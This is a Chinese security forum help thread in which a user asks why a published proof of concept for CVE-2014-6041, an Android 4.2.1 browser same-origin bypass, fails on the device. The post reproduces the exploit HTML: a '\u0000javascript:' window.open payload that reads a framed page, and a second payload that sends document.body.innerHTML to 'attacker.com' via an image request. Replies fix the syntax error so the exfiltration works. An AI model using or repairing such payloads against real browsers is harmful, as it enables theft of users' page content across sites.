首页
社区
课程
招聘
[求助]CVE-2014-6041漏洞无法完全成功执行
发表于: 2014-10-14 09:38 5606

[求助]CVE-2014-6041漏洞无法完全成功执行

2014-10-14 09:38
5606
CVE-2014-6041漏洞是android4.2.1平台上公布的一个同源策略绕过漏洞

网上公布的测试代码包括两部分,
一是
<iframe name="test"src="http://94fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4u0Z5j5h3W2F1k6X3!0K6k6h3y4Q4x3X3g2U0L8$3@1`."></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')">
这部分我在多个浏览器上测试都是能够正常执行的,的确绕过同源检查,弹出alert框

但第二部分,
<iframe name="test"src="http://119K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4u0Z5j5h3W2F1k6X3!0K6k6h3y4Q4x3X3g2U0L8$3@1`."></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:var i=newImage();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')">
没有成功执行,服务器部分应该没错,我把attacker.com改称自己的asp服务器,自己测试都可以,就是在android平台上似乎这段javascript没有成功执行

哪位大神帮忙看看阿

[培训]科锐逆向工程师培训第53期2025年7月8日开班!

收藏
免费 0
支持
分享
最新回复 (4)
雪    币: 43
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
没人关注这个漏洞吗?
2014-10-14 11:25
0
雪    币: 14
活跃值: (73)
能力值: ( LV2,RANK:15 )
在线值:
发帖
回帖
粉丝
3
newImage
2014-10-14 13:01
0
雪    币: 206
活跃值: (1035)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
new Image()中间有空格,//attacker.com  是你的网站(608K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2!0q4x3W2)9^5x3q4!0m8y4W2!0q4x3W2)9^5x3q4!0m8y4W2!0q4c8W2!0n7b7#2)9^5z5g2!0q4c8W2!0n7b7#2)9^5b7@1N6q4g2q4!0q4y4W2)9&6y4W2!0n7z5g2!0q4y4g2!0n7b7#2)9^5c8W2!0q4y4W2)9^5c8g2!0m8y4g2!0q4y4W2)9&6y4q4!0n7y4W2!0q4y4q4!0n7z5q4)9^5b7g2!0q4y4q4!0n7b7#2!0m8x3q4!0q4y4W2)9&6y4g2!0n7x3q4!0q4y4W2)9^5c8q4!0m8c8g2!0q4c8W2!0n7b7#2)9^5z5s2N6%4N6#2)9J5k6i4u0Z5j5h3W2F1k6X3!0K6k6h3y4Q4x3X3g2U0L8$3@1`. body)
2014-10-15 10:18
0
雪    币: 43
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
4楼正解!
2014-10-21 16:15
0
游客
登录 | 注册 方可回帖
返回